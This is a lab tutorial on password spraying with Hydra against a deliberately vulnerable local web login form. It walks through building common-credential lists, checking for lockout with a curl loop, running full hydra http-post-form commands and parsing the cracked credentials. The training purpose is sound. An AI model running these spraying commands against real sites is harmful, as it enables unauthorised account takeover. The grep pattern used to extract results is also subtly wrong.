Introduction
In this lab, you will learn how to conduct password spray attacks using Hydra, a versatile cybersecurity tool for brute-force testing. You'll explore the process of setting up Hydra, creating credential lists, and executing targeted attacks against web authentication forms.
The lab provides hands-on experience in configuring attack parameters, analyzing results, and identifying weak credentials. Through practical exercises, you'll gain insights into common authentication vulnerabilities and defensive strategies.
Install Hydra
In this step, you will install Hydra, a powerful and flexible password-cracking tool that security professionals use to test system security. Hydra can perform brute-force attacks against many different network services like websites (HTTP), file transfers (FTP), and secure shells (SSH). Understanding how these tools work helps you better protect systems against attacks.
First, we need to update your system's package list. This ensures you'll install the latest available version of Hydra:
sudo apt updateThe
sudocommand gives you administrator privileges, whileapt updaterefreshes your list of available software packages.Now install Hydra with this simple command:
sudo apt install hydra -yThe
-yflag automatically answers "yes" to any prompts during installation, making the process smoother.After installation, let's verify Hydra is working correctly by checking its version:
hydra -vYou should see output similar to:
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.This version check confirms Hydra is properly installed and ready for use.
For advanced features and better performance with specific protocols, install these optional dependencies:
sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev -yThese libraries enable Hydra to work with additional services like databases (MySQL, PostgreSQL) and version control systems (Subversion).
Prepare User and Password Lists
In this step, you will create the essential text files that Hydra needs to perform a password spraying attack. These files contain potential usernames and passwords that Hydra will systematically test against the target web form. Password spraying works by trying a few common passwords against many user accounts, which helps avoid account lockouts that occur when trying many passwords against a single account.
First, navigate to your project directory where we'll store our files. This keeps everything organized in one place:
cd ~/projectNow we'll create a file containing common usernames. These are typical account names that might exist on a system. We'll use the nano text editor to create and edit the file:
nano users.txtAdd the following common usernames, one per line:
admin administrator user test guest rootNext, we'll create a password list file. These are weak passwords that users might set, making them good candidates for testing. Again using nano:
nano passwords.txtAdd these commonly used passwords, each on its own line:
password 123456 admin letmein welcome qwertyAfter creating both files, let's verify they exist in our directory. The
ls -lcommand shows detailed file information including when they were created and their sizes:ls -lYou should see both
users.txtandpasswords.txtlisted in the output.Finally, let's check the actual contents of each file to ensure they were created correctly. The
catcommand displays file contents directly in the terminal:cat users.txt cat passwords.txt
Target a Web Form
In this step, you will identify and analyze a target web form for password spraying. We'll use a deliberately vulnerable web application running on http://localhost:8080 for this exercise. Password spraying works by trying a few common passwords against many user accounts, so understanding the login form's structure is crucial before launching the attack.
First, verify the target web application is running:
curl -I http://localhost:8080/loginThe
-Iflag tells curl to fetch only the HTTP headers. You should see a200 OKstatus confirming the login page is accessible. If you get a connection error, make sure the web server is running before proceeding.Examine the login form structure by viewing the page source:
curl http://localhost:8080/login | grep -A5 -B5 "form"This command fetches the HTML content and shows 5 lines before and after any
<form>tags. Look for the form'sactionattribute (where data gets sent) and input field names - these are usually calledusernameandpasswordbut can vary.Create a test request file to document the form's parameters:
nano form_test.txtAdd this content to record the key details Hydra will need:
Target URL: http://localhost:8080/login Method: POST Username field: username Password field: password Failure indicator: "Invalid credentials"The failure indicator helps Hydra recognize when login attempts fail. We'll use this file later to configure our attack.
Test the form manually with a single credential pair:
curl -X POST -d "username=admin&password=wrongpass" http://localhost:8080/login -vThe
-X POSTspecifies the HTTP method, while-dsends the form data. The-vflag shows verbose output so you can verify the "Invalid credentials" response. This confirms the form works as expected with failed logins.Check for account lockout policies by sending 5 rapid requests:
for i in {1..5}; do curl -X POST -d "username=admin&password=wrong$i" http://localhost:8080/login -s -o /dev/null -w "Attempt $i: %{http_code}\n" doneThis loop sends 5 quick failed attempts. Watch if the HTTP status code changes from 200 (success) to 403 (forbidden) which would indicate lockout protections. Real-world applications often have these safeguards, but our test environment doesn't.
Run a Password Spray
In this step, you will execute a password spray attack against the target web form using Hydra with the user and password lists you prepared earlier. Password spraying is a technique where you try a small number of common passwords against many user accounts, which helps avoid account lockouts that might occur with traditional brute-force attacks.
First, navigate to your project directory where your user and password lists are stored:
cd ~/projectNow we'll run Hydra with carefully selected parameters. This command tells Hydra to test each password in your list against each username, using the web form's login page as the target:
hydra -L users.txt -P passwords.txt localhost http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4 -vVLet's break down what each parameter does:
-L users.txt: Points to your list of usernames (one per line)-P passwords.txt: Points to your list of passwords to testhttp-post-form: Specifies we're attacking a web form using POST method/login:...: Defines the form structure - the part after colon tells Hydra how to recognize failed attempts-t 4: Runs 4 parallel connections to speed up the attack-vV: Gives detailed output so you can see the progress
As Hydra runs, watch the output carefully. When Hydra finds valid credentials, it will display them clearly like this:
[80][http-post-form] host: localhost login: admin password: adminTo save your results for documentation or further analysis, run Hydra with the
-oparameter:hydra -L users.txt -P passwords.txt localhost http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4 -o results.txtAfter the attack completes, you can view the saved results with:
cat results.txtThis file will contain all successful login combinations found during the attack.
Analyze Results
In this step, you will analyze the results from your password spray attack to identify compromised credentials and understand the security implications. Password spraying is a technique where attackers try a few common passwords against many accounts rather than many passwords against a few accounts.
First, examine the raw results file created by Hydra. This file contains all the attempts Hydra made during the attack:
cat ~/project/results.txtLook for lines containing "[80][http-post-form]" which indicate successful logins. The number 80 refers to the HTTP port, and http-post-form shows it was a web form submission.
To focus only on successful attempts, extract just the compromised credentials to a new file. The grep command filters lines containing the success pattern:
grep "[80][http-post-form]" ~/project/results.txt > ~/project/compromised_creds.txtCount the number of compromised accounts to understand the scale of the vulnerability. The wc (word count) command with -l flag counts lines:
wc -l ~/project/compromised_creds.txtAnalyze password patterns by generating a password frequency list. This helps identify weak passwords that were commonly used:
awk '{print $6}' ~/project/compromised_creds.txt | sort | uniq -c | sort -nrThe command extracts the 6th field (password), sorts them, counts duplicates, and sorts by frequency.
Create a security report summarizing key findings. This structured format helps document the results clearly:
echo "Password Spray Attack Results" > ~/project/security_report.txt echo "Compromised accounts: $(wc -l < ~/project/compromised_creds.txt)" >> ~/project/security_report.txt echo "Most common password: $(awk '{print $6}' ~/project/compromised_creds.txt | sort | uniq -c | sort -nr | head -1)" >> ~/project/security_report.txtView the final security report to see the compiled results:
cat ~/project/security_report.txt
Summary
In this lab, you have learned how to conduct a password spray attack using Hydra on a Linux system. The process included installing the tool, preparing credential lists, and configuring the attack against a web form.
You also explored Hydra's basic functionality for brute-force attempts on network services. The lab emphasized proper setup techniques, such as creating structured input files and understanding essential command parameters.
